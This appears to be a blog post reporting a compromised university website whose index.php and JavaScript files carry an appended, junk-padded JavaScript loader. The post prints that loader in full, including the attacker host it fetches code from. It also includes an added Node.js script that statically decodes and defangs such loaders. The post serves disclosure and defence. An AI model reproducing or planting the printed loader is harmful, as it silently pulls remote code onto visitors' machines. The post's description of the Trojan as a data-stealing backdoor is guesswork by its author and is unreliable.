http://kk.mercubuana.ac.id/new/index.php: when I opened it with Firefox, my KIS informed me that the site contains Trojan.JS.Agent.Axl; here is the information. If you don't have an antivirus, or your antivirus does not recognize this Trojan, the script will download the real Trojan, trojan-cliker.js.iframe.db, which is dropped with the help of Trojan.JS.Agent.Axl. Trojan trojan-cliker.js.iframe.db will contact its parent site, http://mail-com.hotfile.reuters-com.simpleworldhouse.ru:8080. Of course, the real site is simpleworldhouse.ru.
Dropped trojan in cache

Parent site / contacted server

I don't know exactly what this Trojan does. It was a backdoor from your computer to transmit your data.
Back to the mercubuana site. When you look closely at this site, you will find that their index.php and their js files have been infected by Trojan.JS.Agent.Axl, which adds the following script at the end, below the html code:
*********************
/*GNU GPL*/ try{window.onload = f***unction(){var Jks0ui2n781rkgl = document.createElement('script');***Jks0ui2n781rkgl.setAttribute('type', 'text/javascrip***t');Jks0ui2n781rkgl.setAttribute('src', 'h&(t@&(!t)@p)@:##/$)/$&@#m@@$a!(i&@l^@&#-$c^#$o@@!&m#@.!&^##h$$@@o$&t!)f$$(i^)l)#$#e#)!.$!c^)&o&m (^.#^&r$!e^$$&u)&t#&e@@!)r#)!!&s$#-&&c(o#m!.^)(s^!i&!^m^p(^l@@!e((w()o$@r^(!l)(^d$(h#^o#u^$$s)!e&#&$).@r&)u!#:@(8)&0!(8(0#(/$&$l!)a#&)#t(i&#$)m$e@$@s##).$!c^o(@m) ()/)@)l###(a$!t)^$(i$m(^$e$s$.^$&c@@^o^!#m^&/)$h&^o(&(t&^t$i##@e&))s)***@t(^^a!r&&&.&c!!o#m#@$/^p!^)^r$)^i&!c(&!e!)!m^i##!$n#&i$()s!t@$e$(@@r)) ^!.#@$))c^!o)m)#)#/(&!@g@@$o)@^&@o#g(@##l&(e)!!(.#)((c!o@(^m)&$/(!^@'.replace(/\ (|\!|\$|@|\^|\)|&|#/ig, ''));Jks0ui2n781rkgl.setAttribute('defer', 'defer');/document.body.appendChild***(Jks0ui2n781rkgl);}} catch(e) {}
*********************
Capture of melar.js, altered by the virus, with the script added at the last line
Capture of mmenu.js, altered by the virus, with the script added at the last line
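The junk-character padding in the injected script above can be undone without running it. As an added example (not code from the original post), this Node.js sketch pulls the 'src' string and the character alternation out of the .replace() call, strips those characters, and returns a defanged URL for logging; the function names and the example.test sample are constructed for illustration.

```javascript
// Added example: static analysis only; the suspicious source is never evaluated.
// Matches setAttribute('src', '<obfuscated>'.replace(/<alternation>/flags, ''))
const LOADER_RE =
  /setAttribute\(\s*'src'\s*,\s*'([^']*)'\s*\.replace\(\s*\/((?:\\.|[^\/\\])+)\/[gim]*\s*,\s*''\s*\)/;

// Turn an alternation of single (optionally escaped) characters, e.g. \(|\!|@|#,
// into a Set. Returns null for anything more complex, so we never guess.
function junkSet(pattern) {
  const set = new Set();
  for (const alt of pattern.split('|')) {
    const ch = alt.replace(/^\\/, '');
    if (ch.length !== 1) return null;
    set.add(ch);
  }
  return set;
}

// Returns null when the file does not contain this loader shape.
function recoverLoaderUrl(source) {
  const m = LOADER_RE.exec(source);
  if (!m) return null;
  const junk = junkSet(m[2]);
  if (!junk) return null;
  const url = [...m[1]].filter((c) => !junk.has(c)).join('');
  let host = null;
  try { host = new URL(url).host; } catch (e) { /* not a parseable URL */ }
  return {
    url,
    host,
    // Defanged form is safe to paste into tickets and logs.
    defanged: url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'),
    // The post reports the script appended as the last line of each file.
    onLastLine: m.index > source.trimEnd().lastIndexOf('\n'),
  };
}

// Constructed sample (not the script from the post): a clean function followed
// by an appended loader whose URL is padded with junk characters.
const SAMPLE = String.raw`function menu(){}
try{window.onload = function(){var s = document.createElement('script');s.setAttribute('src', 'h#t@t!p:$/^/l&o)a(d#e@r.e!x$a^m&p)l(e.t#e@s!t:8$0^8&0/a)b(c/'.replace(/\(|\!|\$|@|\^|\)|&|#/ig, ''));document.body.appendChild(s);}} catch(e) {}`;

console.log(recoverLoaderUrl(SAMPLE));
```

Run over every .js and .php file in the web root, a non-null result with onLastLine set to true marks a file to restore from a clean copy.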
I don't know whether the malicious code has been removed from the site since this article was written. :)